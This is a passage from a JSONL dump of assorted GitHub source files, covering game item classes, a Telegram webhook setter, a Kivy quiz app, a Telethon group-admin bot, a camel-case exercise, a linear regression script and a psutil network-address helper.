rare \n 3:8,# epic \n 4:18# legendary\n })\n\nclass Axe(ColdWeapon):\n def __init__(self, rare):\n ColdWeapon.__init__(self, 'Axe', rare, {\n 1:5,# uncommon \n 2:6,# rare \n 3:8,# epic \n 4:20# legendary\n })\n\ncoldweapons = [\n Knife(1),\n Crowbar(2),\n Axe(2),\n]","repo_name":"purpl3-yt/trash-bin","sub_path":"python/Game_2.0/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"13857276121","text":"from time import sleep\nimport requests\n\nfrom instabot.settings import HOST, TG_TOKEN\n\n\nurl = \"https://api.telegram.org/bot{}/\".format(TG_TOKEN)\n\n\ndef set_webhook():\n params = {'url': HOST + '/bot/' + TG_TOKEN + '/'}\n method = 'setWebhook'\n response = requests.post(url + method, params)\n print('Set webhook')\n print('Status code:', response.status_code)\n return response\n\n\ndef delete_webhook():\n method = 'deleteWebhook'\n response = requests.post(url + method)\n print('Delete webhook')\n print('Status code:', response.status_code)\n return response\n\n\ndelete_webhook()\nsleep(1)\nset_webhook()\n","repo_name":"oleshonchar/instabot","sub_path":"telegram_bot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10222058536","text":"# -*- coding: utf-8 -*-\n__version__ = '1.0'\nimport textwrap\nimport random\nimport shutil\nimport math\nimport sys\nimport os\n\nfrom kivymd.app import MDApp\nfrom kivymd.uix.screen import MDScreen\nfrom kivy.lang import Builder\nfrom kivy.factory import Factory\nfrom kivymd.toast import toast\nfrom kivy.core.window import Window\nfrom kivy.clock import Clock\nfrom kivy.animation import Animation\nfrom kivy.utils import platform\nfrom kivy.uix.screenmanager import ScreenManager\nfrom kivymd.uix.textfield import MDTextField\nfrom kivymd.uix.dialog import MDDialog\nfrom kivymd.uix.button import MDFlatButton\n\nfrom modules.ReadFile import AddStrings\nfrom modules.Stirrer import ListShuffle as LS\nfrom modules.SearchFiles import SearchFiles\nfrom modules.buttons.MyLongTouchButton import LongTouchButton\n\n# Здесь приложение запрашивает у системы доступ к памяти\nif platform == 'android':\n\tfrom android.permissions import request_permissions, Permission\n\trequest_permissions([Permission.WRITE_EXTERNAL_STORAGE, Permission.READ_EXTERNAL_STORAGE])\n\tfrom android.storage import 
primary_external_storage_path\n\nclass Enter(MDScreen):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(**kwargs)\n\t\tself.ids.Toolbar.left_action_items=[[\"menu\", lambda x: Clock.schedule_once(self.switcher)]]\n\t\tself.ids.Toolbar.right_action_items=[['file-plus-outline', lambda x: Clock.schedule_once(self.add)], ['exit-to-app', lambda x: Clock.schedule_once(self.exit_), 'выход']]\n\t\tself.count = 0\n\t\tself.ans_true = 0\n\t\tself.ids.Question.bind(on_touch_move=lambda x, touch: self.gesture_open(touch))\n\t\tWindow.bind(on_keyboard=self.key_input)\n\t\t\n\tdef file_selection(self, args):\n\t\tif args.icon == 'delete' :\n\t\t\tpass\n\t\telse:\n\t\t\t# qa получает список с двумя вложенными списками\n\t\t\tqa = AddStrings().does_adding(f'/storage/emulated/0/Zybrila/{args.text}.zybr')\n\t\t\tif qa is None:\n\t\t\t\ttoast('Файл составлен неверно', True, 80, 500, 0)\n\t\t\telif qa == 'short':\n\t\t\t\ttoast('Слишком короткое содержимое', True, 80, 500, 0)\n\t\t\telif qa == 'zero':\n\t\t\t\ttoast('Файл абсолютно пуст',\n\t\t\t\t\tTrue, 80, 500, 0)\n\t\t\telse:\n\t\t\t\t# получаем список вопросов\n\t\t\t\tself.questions = qa[0]\n\t\t\t\t# получаем список ответов\n\t\t\t\tself.true_answers = qa[1]\n\t\t\t\tClock.schedule_once(self.shuffler)\n\t\t\t\tself.ids.Toolbar.title = args.text\n\t\t\t\tClock.schedule_once(self.options_back)\n\t\t\t# создаётся список с блоками ответов\n\t\t\tself.answers = []\n\t\t\t# создаются счётчики вопросов и правильных ответов на них\n\t\t\tself.count = 0\n\t\t\tself.ans_true = 0\n\t\t\t\n\tdef shuffler(self, args):\n\t\t# списки вопросов и ответов перемешиваются в случайной последовательности, но соответствуют друг другу\n\t\tLS().shuffle(self.questions,\n\t\t\t\t\t\t\tself.true_answers)\n\t\tClock.schedule_once(self.doing)\n\n\t# процесс прохождения теста\n\tdef doing(self, args):\n\t\tself.questions = LS().quest()\n\t\tself.true_answers = LS().ans()\n\t\t# создаются блоки ответов на вопросы\n\t\tfor i in self.true_answers:\n\t\t\tself.ans = []\n\t\t\t# добавляется один правильный ответ\n\t\t\tself.ans.append(i)\n\t\t\t# добавляется 3 неправильных ответа\n\t\t\twhile len(self.ans) < 4:\n\t\t\t\tlie_ans = random.choice(\n\t\t\t\t\t\t\tself.true_answers)\n\t\t\t\tself.ans.append(lie_ans)\n\t\t\t\t# исключаются повторения с помощью метода set\n\t\t\t\tself.ans = list(set(self.ans))\n\t\t\tself.answers.append(self.ans)\n\t\t# проверка существования виджетов с ответами и их удаление\n\t\ttry:\n\t\t\tself.ids.place_for_buttons.clear_widgets()\n\t\t\tself.ids.Basic.remove_widget(self.shield)\n\t\texcept: pass\n\t\tif self.count == len(self.questions):\n\t\t\tClock.schedule_once(self.itog)\n\t\t\tself.ids.Counter_questions.text = ''\n\t\telse:\n\t\t\tself.ids.Question.text = textwrap.fill(str(self.questions[self.count]), 28)\n\t\t\trandom.shuffle(self.answers[self.count])\n\t\t\tself.ids.Counter_questions.text=f'{self.count+1} вопрос из {len(self.questions)}'\n\t\t\t# создание кнопок с вариантами ответов\n\t\t\tfor answer in self.answers[self.count]:\n\t\t\t\tvariants_btns = Factory.VariantsButtons()\n\t\t\t\tvariants_btns.bind(\n\t\t\t\t\ton_release=self.examination)\n\t\t\t\tvariants_btns.text = str(answer)\n\t\t\t\tself.ids.place_for_buttons.add_widget(variants_btns)\n\t\t\t\tself.variants_btns = variants_btns\n\t\tself.count +=1\n\n\t# проверка истинности ответа\n\tdef examination(self, args):\n\t\tif args.text == str(self.true_answers[self.count - 1]):\n\t\t\targs.md_bg_color = [.5, .7, 0, 1]\n\t\t\tself.ans_true 
+=1\n\t\t\ttoast(\n\t\t\t\t\t'Правильно',\n\t\t\t\t\tTrue, 80, 500, 0)\n\t\telse:\n\t\t\targs.md_bg_color = [1, 0, 0, 1]\n\t\t\ttoast(\n\t\t\t\tstr(self.true_answers[self.count - 1]),\n\t\t\t\tTrue, 80, 500, 0)\n\t\t'''ставится экран для защиты от\n\t\tнажатия, пока идёт проверка, что\n\t\tбы избежать неправильной\n\t\tработы приложения из-за\n\t\tневыдержанных таймингов\n\t\tмежду вопросами'''\n\t\tself.shield = Factory.Shield()\n\t\tself.ids.Basic.add_widget(self.shield)\n\t\tClock.schedule_once(self.doing, 1.5)\n\n\t# оценка результатов прохождения теста\n\tdef itog(self, args):\n\t\tself.ids.Question.text = f'Правильных ответов: {self.ans_true} из {self.count - 1}'\n\t\trefresh = Factory.VariantsButtons()\n\t\trefresh.bind(on_press=self.reset)\n\t\trefresh.text = 'Ещё раз?'\n\t\tself.ids.place_for_buttons.add_widget(refresh, index = 5)\n\t\tpercent_true = math.ceil(100 / len(self.questions) * self.ans_true)\n\t\tif percent_true <= 60:\n\t\t\tgrade = 'Плохо'\n\t\telif 61 < percent_true <= 80:\n\t\t\tgrade = 'Неплохо'\n\t\telif 81 < percent_true <= 95:\n\t\t\tgrade = 'Хорошо'\n\t\telse:\n\t\t\tgrade = 'Отлично'\n\t\tself.ids.Counter_questions.text = f'{grade}. Правильных ответов {percent_true}%'\n\n\tdef reset(self, args):\n\t\tself.count = 0\n\t\tself.ans_true = 0\n\t\tself.ids.place_for_buttons.clear_widgets()\n\t\tClock.schedule_once(self.doing)\n\n\t# жест пальцем по экрану\n\tdef gesture_open(self, touch):\n\t\t'''определяется расстояние для\n\t\tжеста. В данном случае это левая\n\t\tполовина экрана'''\n\t\tif touch.sx < .5:\n\t\t '''определяется скорость жеста с\n\t\t помощью дельты координат по\n\t\t оси Х'''\n\t\t if touch.dx > 10:\n\t\t \tClock.schedule_once(self.switcher)\n\n\t'''переключатель движения бокового\n\tменю. Если оно открыто, то\n\tзакроется, и наоборот'''\n\tdef switcher(self, args):\n\t\ttry:\n\t\t\tself.opt\n\t\t\tClock.schedule_once(self.options_back)\n\t\texcept:\n\t\t\tClock.schedule_once(self.options)\n\n\tdef options(self, args):\n\t\ttry:\n\t\t\tos.mkdir('/storage/emulated/0/Zybrila')\n\t\t\tshutil.copy('./Advanced english.zybr', '/storage/emulated/0/Zybrila', follow_symlinks=True)\n\t\t\tshutil.copy('./Simple english.zybr', '/storage/emulated/0/Zybrila', follow_symlinks=True)\n\t\t\tos.rename('/storage/emulated/0/Zybrila/Advanced english.zybr', '/storage/emulated/0/Zybrila/Технический английский.zybr')\n\t\t\tos.rename('/storage/emulated/0/Zybrila/Simple english.zybr', '/storage/emulated/0/Zybrila/Школа второй класс.zybr')\n\t\texcept FileExistsError:\n\t\t\tpass\n\t\tself.opt = Factory.ListBackground()\n\t\tself.opt.ids.plm.bind(on_press=self.options_back)\n\t\tself.opt.ids.Constructor.bind(on_press=self.add)\n\t\tself.ids.Basic.add_widget(self.opt)\n\t\tself.move=Animation(\n\t\t\tpos_hint={'center_x':.45, 'center_y':.46},\n\t\t\tduration=.17)\n\t\tself.move.start((self.opt))\n\t\tlist_items = SearchFiles('/storage/emulated/0/Zybrila').search('zybr', '')\n\t\tlist_items = sorted(list_items)\n\t\tfor i in list_items:\n\t\t\tself.asd = LongTouchButton(\n\t\t\t\t\ttext=i[:-5],\n\t\t\t\t\ticon='script-text-outline')\n\t\t\tself.asd.bind(on_release=self.file_selection)\n\t\t\tself.asd.bind(icon=self.change_begavior_const)\n\t\t\tself.opt.ids.Greed.add_widget(self.asd)\n\n\tdef options_back(self, args):\n\t\tself.move_back = Animation(\n\t\t\tpos_hint= {'center_x':-1, 'center_y':.46},\n\t\t\tduration=.17)\n\t\tself.move_back.start(self.opt)\n\t\tdel self.opt\n\n\tdef options_close(self, args):\n\t\tif args.icon == 
'delete':\n\t\t\tpass\n\t\telse:\n\t\t\tself.move_back = Animation(\n\t\t\t\tpos_hint= {'center_x':-1, 'center_y':.46},\n\t\t\t\tduration=.17)\n\t\t\tself.move_back.start(self.opt)\n\t\t\tdel self.opt\n\n\t# изменение поведения кнопок списка при их нажатии\n\tdef change_begavior_const(self, button, args):\n\t\t# проверка, есть ли хоть один выделенный элемент списка\n\t\tL = []\n\t\tfor i in self.opt.ids.Greed.children:\n\t\t\ttry:\n\t\t\t\tif i.icon:\n\t\t\t\t\tL.append(i.icon)\n\t\t\texcept AttributeError: pass\n\t\tif L.count('delete') != 0:\n\t\t\tself.opt.ids.Constructor.text = 'Удалить'\n\t\t\tself.opt.ids.Constructor.md_bg_color = (1, 0, 0, .8)\n\t\t\tself.opt.ids.Constructor.unbind(\n\t\t\t\ton_press=self.add) # tyt\n\t\t\tself.opt.ids.Constructor.bind(on_press=self.delete_rec)\n\t\telse:\n\t\t\tself.opt.ids.Constructor.text = 'Конструктор'\n\t\t\tself.opt.ids.Constructor.md_bg_color = (0, .5, 0, .9)\n\t\t\tself.opt.ids.Constructor.unbind(\n\t\t\t\ton_press=self.delete_rec)\n\t\t\tself.opt.ids.Constructor.bind(\n\t\t\t\ton_press=self.add) # tyt\n\t\tbutton.bind(on_press=self.rebind)\n\t\tbutton.unbind(on_release=self.file_selection)\n\n\t#перепривязка кнопок\n\tdef rebind(self, args):\n\t\targs.icon = args.icon_record\n\t\targs.icon_color = (.5, .5, .5, 1)\n\t\targs.unbind(on_press=self.rebind)\n\t\targs.bind(on_release=self.auxiliary_bind)\n\n\tdef auxiliary_bind(self, args):\n\t\t'''если сделать эту привязку кнопки\n\t\tв предыдущем методе, а не\n\t\tздесь, то файл будет открываться\n\t\tдаже если он помечен для\n\t\tудаления'''\n\t\targs.bind(on_release=self.file_selection)\n\n\tdef delete_rec(self, args):\n\t\tlist_rec = []\n\t\tfor i in self.opt.ids.Greed.children:\n\t\t\ttry:\n\t\t\t\tif i.icon == 'delete':\n\t\t\t\t\tlist_rec.append(i)\n\t\t\texcept AttributeError:\n\t\t\t\tcontinue\n\t\tfor i in list_rec:\n\t\t\tself.opt.ids.Greed.remove_widget(i)\n\t\t\tos.remove(\n\t\t\t\t'/storage/emulated/0/Zybrila/'\n\t\t\t\t+ str(i.text)\n\t\t\t\t+ '.zybr')\n\t\tself.opt.ids.Constructor.text = 'Конструктор'\n\t\tself.opt.ids.Constructor.md_bg_color = (0, .5, 0, .9)\n\t\tself.opt.ids.Constructor.unbind(\n\t\t\t\ton_press=self.delete_rec)\n\t\tself.opt.ids.Constructor.bind(\n\t\t\t\ton_press=self.add) # tyt\n\n\tdef add(self, args):\n\t\tself.manager.current = '2'\n\t\tself.manager.transition.direction = 'left'\n\n\tdef exit_(self, args):\n\t\tsys.exit()\n\n\t# отслеживает нажатия кн. 
\"назад\"\n\tdef key_input(self, window,\n\t\t\t\t\t\t\tkey, scancode,\n\t\t\t\t\t\t\tcodepoint, modifier):\n\t\ttry:\n\t\t\tif key == 27:\n\t\t\t\tfor i in self.opt.ids.Greed.children:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tif i.icon:\n\t\t\t\t\t\t\ti.icon = i.icon_record\n\t\t\t\t\t\t\ti.icon_color = (.5, .5, .5, 1)\n\t\t\t\t\texcept AttributeError:\n\t\t\t\t\t\tpass\n\t\t\telse:\n\t\t\t\treturn False\n\t\texcept AttributeError:\n\t\t\ttoast('Нажмите значок выхода',\n\t\t\t\t\tTrue, 80, 500, 0)\n\n\n\n\n\nclass Creator(MDScreen):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(**kwargs)\n\t\tself.count = 1\n\t\tcount=self.count\n\t\tself.ids.q.helper_text = f'Вопрос № {self.count}'\n\t\tself.ids.save.disabled = True\n\t\tself.list_of_questions = []\n\t\tself.list_of_answers = []\n\n\tdef counter(self):\n\t\tself.count += 1\n\t\tself.ids.q.helper_text = f'Вопрос № {self.count}'\n\t\tif self.count>10:\n\t\t\tself.ids.save.disabled = False\n\t\tself.list_of_questions.append(self.ids.q.text)\n\t\tself.list_of_answers.append(self.ids.a.text)\n\t\tself.ids.q.text = ''\n\t\tself.ids.a.text = ''\n\n\tdef zero_counter(self):\n\t\tself.count = 1\n\t\tself.ids.q.helper_text = f'Вопрос № {self.count}'\n\t\tself.ids.save.disabled = True\n\t\tself.ids.n.text = ''\n\n\tdef save_list(self):\n\t\tif self.ids.n.text not in ('', ' '):\n\t\t\tname=self.ids.n.text\n\t\t\tf=open(f'/storage/emulated/0/Zybrila/{name}.zybr', 'w')\n\t\t\tf.write('# questions'+'\\n')\n\t\t\tf.close()\n\t\t\twith open(f'/storage/emulated/0/Zybrila/{name}.zybr', 'a') as f:\n\t\t\t\tfor i in range(len(self.list_of_questions)):\n\t\t\t\t\tf.write(str(self.list_of_questions[i])+'\\n')\n\n\t\t\twith open(f'/storage/emulated/0/Zybrila/{name}.zybr', 'a') as f:\n\t\t\t\tf.write('\\n# true_answers'+'\\n')\n\t\t\t\tfor i in range(len(self.list_of_answers)):\n\t\t\t\t\tf.write(str(self.list_of_answers[i])+'\\n')\n\t\t\tself.manager.current = '1'\n\t\t\tself.zero_counter()\n\t\telse:\n\t\t\tself.warning=MDDialog(\n\t\t\t\ttitle='Внимание!',\n\t\t\t\tauto_dismiss=False,\n\t\t\t\ttype='alert',\n\t\t\t\ttext='Заполните поле \"Название\", что бы создать тест.',\n\t\t\t\tbuttons=[MDFlatButton(\n\t\t\t\t\ttext='Ладно',\n\t\t\t\t\ton_press=self.dialod_dismiss)])\n\t\t\tself.warning.open()\n\n\tdef dialod_dismiss(self, args):\n\t\tself.warning.dismiss()\n\t\tClock.schedule_once(self.focus_name, .2)\n\tdef focus_name(self, args):\n\t\tself.ids.n.focus = True\n\n\n\n\n\nclass MyApp(MDApp):\n\tdef build(self):\n\t\tWindow.bind(\n\t\t\ton_keyboard=self.key_input)\n\t\t#return Enter()\n\t\tself.sm = ScreenManager()\n\t\tself.sm.add_widget(Enter(name='1'))\n\t\tself.sm.add_widget(Creator(name='2'))\n\t\t#self.sm.current = '2'\n\t\treturn self.sm\n\t\t\n\tdef on_start_(self):\n\t\tself.fps_monitor_start()\n\t\t\n\tdef key_input(self, window,\n\t\t\t\t\t\t\tkey, scancode,\n\t\t\t\t\t\t\tcodepoint, modifier):\n\t\tif key == 27:\n\t\t\t#toast('Нажмите ещё раз для выхода', True, 80, 500, 0)\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef on_pause(self):\n\t\ttoast('Приложение приостановлено',\n\t\t\t\tTrue, 80, 500, 0)\n\t\treturn True\n\t\n\tdef on_resume(self):\n\t\ttoast('Приложение работает',\n\t\t\t\tTrue, 80, 500, 0)\n\t\treturn True\n\t\t\nif __name__ == '__main__':\n\tMyApp().run()","repo_name":"Chypatan/Zybrila","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14003,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5292375364","text":"from DionRobot 
import dion\nfrom DionRobot.status import *\n\nfrom telethon import events, Button, types\nfrom telethon.tl.functions.channels import EditAdminRequest, EditBannedRequest\nfrom telethon.tl.types import ChatAdminRights, ChatBannedRights\nfrom telethon.tl.functions.users import GetFullUserRequest\nfrom telethon.tl.functions.messages import ExportChatInviteRequest\n\n\nADMIN_TEXT = \"\"\"\n**✘ A module from which admins of the chat can use!**\n‣ `/ban` - To ban a user in the chat.\n‣ `/kick` - To kick a user in the chat.\n‣ `/pin` - To pinned a reply msg.\n‣ `/unpin` - To Unpin the latest pinned msg.\n‣ `/unpinall` - To unpinall all pinned message at once.\n‣ `/pinned` - To get current pinned msg.\n‣ `/promote` - To Promote a user in the chat.\n‣ `/demote` - To Demote a user in the chat.\n‣ `/invitelink` - To get invitelink of a chat.\n\"\"\"\n\n@dion.on(events.callbackquery.CallbackQuery(data=\"admin\"))\nasync def _(event):\n await event.edit(ADMIN_TEXT, buttons=[[Button.inline(\"« Bᴀ��ᴋ\", data=\"help\")]])\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]promote ?(.*)\"))\n@is_admin\nasync def promote(event, perm):\n if event.is_private:\n await event.reply(\"This cmd is made to be used in groups, not in PM!\")\n return\n\n if not perm.add_admins:\n await event.reply(\"You are missing the following rights to use this command:__Can Add Admins!__\")\n return\n input_str = event.pattern_match.group(1)\n user = await event.get_reply_message()\n if not input_str and not user:\n await event.reply(\"Reply to a user or give its username to promote him!\")\n return\n sed = await dion(GetFullUserRequest(id=user.sender_id or input_str))\n await dion(EditAdminRequest(event.chat_id, user.sender_id or input_str, ChatAdminRights(\n add_admins=False,\n invite_users=True,\n change_info=False,\n ban_users=True,\n delete_messages=True,\n pin_messages=True), rank=\"Admin\"))\n\n if not input_str:\n await event.reply(f\"Successfully Promoted [{sed.user.first_name}](tg://user?id={user.sender_id}) in {event.chat.title}!\")\n return\n\n await event.reply(f\"Succesfully Promoted {input_str} in {event.chat.title}\")\n \n\n@dion.on(events.NewMessage(pattern=\"^[!?/]demote ?(.*)\"))\n@is_admin\nasync def demote(event, perm):\n if event.is_private:\n await event.reply(\"This cmd is made to be used in groups, not in PM!\")\n return\n if not perm.add_admins:\n await event.reply(\"You are missing the following rights to use this command:__Can Add Admins!__\")\n return\n input_str = event.pattern_match.group(1)\n user = await event.get_reply_message()\n if not input_str and not user:\n await event.reply(\"Reply to a user or give its username to demote him!\")\n return\n sed = await dion(GetFullUserRequest(id=user.sender_id or input_str))\n await dion(EditAdminRequest(event.chat_id, user.sender_id or input_str, ChatAdminRights(\n add_admins=False,\n invite_users=None,\n change_info=None,\n ban_users=None,\n delete_messages=None,\n pin_messages=None), rank=\"Not Admin\"))\n\n if not input_str:\n await event.reply(f\"Successfully Demoted [{sed.user.first_name}](tg://user?id={user.sender_id}) in {event.chat.title}!\")\n return\n\n await event.reply(f\"Succesfully Demoted {input_str} in {event.chat.title}\")\n \n\n@dion.on(events.NewMessage(pattern=\"^[!?/]kick ?(.*)\"))\n@is_admin\nasync def kick(event, perm):\n if event.is_private:\n await event.reply(\"This cmd is made to be used in groups not PM\")\n return\n if not perm.ban_users:\n await event.reply(\"You are missing the following rights to use this command:__Can Ban 
Users!__\")\n return\n input_str = event.pattern_match.group(1)\n msg = await event.get_reply_message()\n if not input_str and not msg:\n await event.reply(\"Reply to a user or give its username to kick him\")\n return\n\n replied_user = msg.sender_id\n us = msg.sender.username\n info = await dion.get_entity(us)\n await dion.kick_participant(event.chat_id, input_str or replied_user)\n await event.reply(f\"Succesfully Kicked [{info.first_name}](tg://user?id={replied_user}) from {event.chat.title}\")\n\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]ban ?(.*)\"))\n@is_admin\nasync def ban(event, perm):\n if event.is_private:\n await event.reply(\"This cmd is made to be used in groups not PM\")\n return\n if not perm.ban_users:\n await event.reply(\"You are missing the following rights to use this command:__Can Ban Users!__\")\n return\n input_str = event.pattern_match.group(1)\n msg = await event.get_reply_message()\n if not input_str and not msg:\n await event.reply(\"Reply to a user or give its username to ban him\")\n return\n replied_user = msg.sender_id\n us = msg.sender.username\n info = await dion.get_entity(us)\n await dion(EditBannedRequest(event.chat_id, replied_user, ChatBannedRights(until_date=None, view_messages=True)))\n await event.reply(f\"Succesfully Banned [{info.first_name}](tg://user?id={replied_user}) in {event.chat.title}\")\n\n\n@dion.on(events.NewMessage(pattern=\"^[?!/]pinned\"))\nasync def get_pinned(event):\n chat_id = (str(event.chat_id)).replace(\"-100\", \"\")\n\n Ok = await dion.get_messages(event.chat_id, ids=types.InputMessagePinned()) \n tem = f\"The pinned message in {event.chat.title} is here.\"\n await event.reply(tem, parse_mode=\"html\", link_preview=False)\n\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]pin ?(.*)\"))\n@is_admin\nasync def pin(event, perm):\n if not perm.pin_messages:\n await event.reply(\"You are missing the following rights to use this command:__Can Pin Message__.\")\n return\n msg = await event.get_reply_message()\n if not msg:\n await event.reply(\"Reply to a msg to pin it!\")\n return\n input_str = event.pattern_match.group(1)\n if \"notify\" in input_str:\n await dion.pin_message(event.chat_id, msg, notify=True)\n return\n await dion.pin_message(event.chat_id, msg)\n\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]unpin ?(.*)\"))\n@is_admin\nasync def unpin(event, perm):\n if not perm.pin_messages:\n await event.reply(\"You are missing the following rights to use this command:__Can Pin Message__.\")\n return\n chat_id = (str(event.chat_id)).replace(\"-100\", \"\")\n ok = await dion.get_messages(event.chat_id, ids=types.InputMessagePinned())\n await dion.unpin_message(event.chat_id, ok)\n await event.reply(f\"Successfully unpinned [this](t.me/{event.chat.username}/{ok.id}) message.\", link_preview=False)\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]permapin\"))\n@is_admin\nasync def permapin(event, perm):\n if not perm.pin_messages:\n await event.reply(\"You are missing the following rights to use this command:__Can Pin Message.__\")\n return\n msg = await event.get_reply_message()\n if not msg:\n await event.reply(\"Reply to a msg to permapin it.\")\n return\n hn = await dion.send_message(event.chat_id, msg.message)\n await dion.pin_message(event.chat_id, hn, notify=True)\n\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]unpinall\"))\nasync def unpinall(event, perm):\n if not perm.pin_messages:\n await event.reply(\"You are missing the following rights to use this command:__Can Pin Message!__\")\n return\n UNPINALL_TEXT = \"\"\"\nAre 
you sure you want to unpin all message?\nThis action can't be undone!\n\"\"\"\n\n await dion.send_message(event.chat_id, UNPINALL_TEXT, buttons=[\n [Button.inline(\"Confirm\", data=\"unpin\")], \n [Button.inline(\"Cancel\", data=\"cancel\")]])\n\n@dion.on(events.callbackquery.CallbackQuery(data=\"unpin\"))\nasync def confirm(event):\n check = await event.client.get_permissions(event.chat_id, event.sender_id)\n if check.is_creator:\n await dion.unpin_message(event.chat_id)\n await event.edit(\"Unpinned All Message!\")\n return \n\n await event.answer(\"You are missing the following rights to use this command: Can Pin Message!\", alert=True)\n\n@dion.on(events.callbackquery.CallbackQuery(data=\"cancel\"))\nasync def cancel(event):\n\n check = await event.client.get_permissions(event.chat_id, event.sender_id)\n if check.is_creator:\n await event.edit(\"Unpinning of all messags has been cancelled!\")\n return \n\n await event.answer(\"You are missing the following rights to use this command: Can Pin Message!\", alert=True)\n\n\n@dion.on(events.NewMessage(pattern=\"^[!?/]invitelink\"))\nasync def invitelink(event):\n if event.is_private:\n await event.reply(\"This cmd is made to be used in groups, not in PM!\")\n return\n link = await dion(ExportChatInviteRequest(event.chat_id))\n await event.reply(f\"Group link of {event.chat.title} is [here]({link.link})\", link_preview=False)\n","repo_name":"SeorangDion/DionBot","sub_path":"DionRobot/modules/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":9003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"70573027772","text":"\"\"\"\nCodewars:\n\nComplete the method/function so that it converts dash/underscore delimited words into camel casing.\nThe first word within the output should be capitalized only if the original word was\ncapitalized (known as Upper Camel Case, also often referred to as Pascal case).\n\nExamples\n\"the-stealth-warrior\" gets converted to \"theStealthWarrior\"\n\"The_Stealth_Warrior\" gets converted to \"TheStealthWarrior\"\n\"\"\"\n\n\ndef to_camel_case(text: str):\n import re\n # Делим входящую строку \"text\" по соответствующим симолам из класса, указанного в кавычках []\n words_list = re.split('[-_ .]', text)\n\n # Если строка не пустая, выполняем алгоритм\n if text.strip():\n new_words_list = []\n for word in words_list:\n title_word = word[0].upper() + word[1:].lower()\n new_words_list.append(title_word)\n if new_words_list[0][0] != words_list[0][0]:\n first_elem = new_words_list[0][0].lower() + new_words_list[0][1:]\n new_words_list[0] = first_elem\n return \"\".join(new_words_list)\n\n # В случае передачи пустой строки или строки с пробелами возвращаем пустую строку\n else:\n return \"\".join(words_list)\n\n\nprint(to_camel_case('The-Pippi_Is_kawaii'))\nprint(to_camel_case('A_pippi-was-Pippi'))\nprint(to_camel_case('A-Lenn_is.ill'))\nprint(to_camel_case('The-Lenn_is.ill'))\nprint(to_camel_case('A-B_C-D G.k'))\n","repo_name":"avborisov86/qa_textbook_vs_codewars_python","sub_path":"cw_to_camel_case.py","file_name":"cw_to_camel_case.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18112934057","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 14 16:09:35 2018\n\n@author: raghup\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\ndf = pd.read_csv('50_Startups.csv')\n\ndf.head()\ndesc = df.describe()\n\nfor i in desc.columns:\n if 
desc[i]['std'] == 0:\n df = df.drop(i,axis=1)\ndf.columns\nunique_states = list(df['State'].unique())\n\nX = df.iloc[:,:-1].values\nY = df.iloc[:,-1].values\n\n\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder = LabelEncoder()\nX[:, 3] = labelencoder.fit_transform(X[:, 3])\nonehotencoder = OneHotEncoder(categorical_features = [3])\nX= onehotencoder.fit_transform(X).toarray()\n\nX = X[:, 1:]\n\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, Y, test_size = 0.2, random_state = 0)\n\nx1 = X_train[:]\nfrom sklearn.preprocessing import MinMaxScaler\nsc_X = MinMaxScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.transform(X_test)\n\n\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n\ny_pred = regressor.predict(X_test)\n\n\nimport matplotlib.pyplot as plt\nplt.plot(range(len(y_pred)),y_pred,color='red',label = 'predicted')\nplt.scatter(range(len(y_test)),y_test,color='blue',label = 'original')\nplt.legend(loc='upper right')\n#plt.savefig('Multiple Linear Regression')\nplt.show()\nplt.close()","repo_name":"Raghu7845/100-days-of-ml-challange","sub_path":"Multiple Linear Regression/MultiLinearReg.py","file_name":"MultiLinearReg.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16596320264","text":"import psutil\nimport time\nimport module\nimport socket\n\nclass Host(module.BaseModule):\n\n \"\"\"\n * {{addr(family)}} - get address for the given address family \n (one of ip, ip6, link)\n * {{ip}} - get IPv4 address \n \"\"\"\n\n def __init__(self, ttl=300): \n self.interfaces = None\n self.ttl = ttl\n\n def keys(self):\n return [\"addr\", \"ip\"]\n\n def get(self, key): \n def addr(device, address_family):\n if address_family == \"ip\":\n af = socket.AF_INET\n elif address_family == \"ip6\":\n af = socket.AF_INET6\n elif address_family == \"link\":\n af = psutil.AF_LINK\n else:\n raise ValueError(\"Unsupported address family: %s\" % address_family)\n \n curtime = time.time()\n if self.interfaces is None or curtime - self.last_query > self.ttl:\n self.interfaces = psutil.net_if_addrs()\n self.last_query = curtime\n\n for addr in self.interfaces[device]:\n if addr.family == af:\n return addr.address\n\n raise ValueError(\"Device %s doesn't have address of the address family %s\" % (device, address_family))\n def ip(device):\n return addr(device, \"ip\")\n if key == \"addr\":\n return addr\n if key == \"ip\": \n return ip\n else:\n raise KeyError()","repo_name":"thingswise/tw-etcdstat","sub_path":"etcdstat/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 